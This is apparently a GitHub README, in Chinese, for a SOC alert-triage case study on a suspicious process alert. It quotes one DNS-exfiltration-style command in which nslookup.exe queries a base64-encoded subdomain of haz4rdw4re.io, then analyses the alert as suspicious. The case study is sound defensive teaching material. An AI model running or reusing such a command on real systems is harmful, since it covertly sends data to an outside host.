Huey-ashton36/soc-alert-triage-case-study

GitHub: Huey-ashton36/soc-alert-triage-case-study

记录一次 SOC 告警分诊与恶意软件分析的完整案例研究,展示从可疑进程执行到最终研判的调查过程。

Stars: 0 | Forks: 0

# soc-alert-triage-案例研究 SOC 告警分诊与恶意软件分析 soc-alert-triage-case-study/ │ ├── README.md ├── evidence/ │ ├── alert-dashboard.png │ ├── nslookup-command.png │ └── investigation-notes.md # SOC 告警分诊案例研究 ## 概述 本项目记录了一项 SOC 告警分诊调查,通过对可疑的进程执行进行分析,以确定该活动是否为恶意行为。 ## 告警摘要 - **告警类型:** 可疑的父子进程关系 - **严重程度:** 高 - **类别:** 进程执行 - **状态:** 等待调查 关键证据 可疑命令 "C:\Windows\system32\nslookup.exe" RmYjEyNGZiMTY1NjZlfQ==.haz4rdw4re.io ## 展示技能 告警分诊 进程分析 DNS 调查 威胁狩猎 恶意软件分析 MITRE ATT&CK 映射 分析 该告警由 nslookup.exe 的执行触发 子域名字段似乎是 base64 编码的 结论 该告警被归类为可疑,而非确认的恶意行为。 未发现任何支持的威胁指标,例如恶意 payload 执行、持久化、权限提升或横向移动。现有证据不足以将其升级为确认的安全事件。
标签:DAST, SOC分析, 告警分诊, 安全运营, 恶意软件分析, 扫描框架, 网络安全, 防御加固, 隐私保护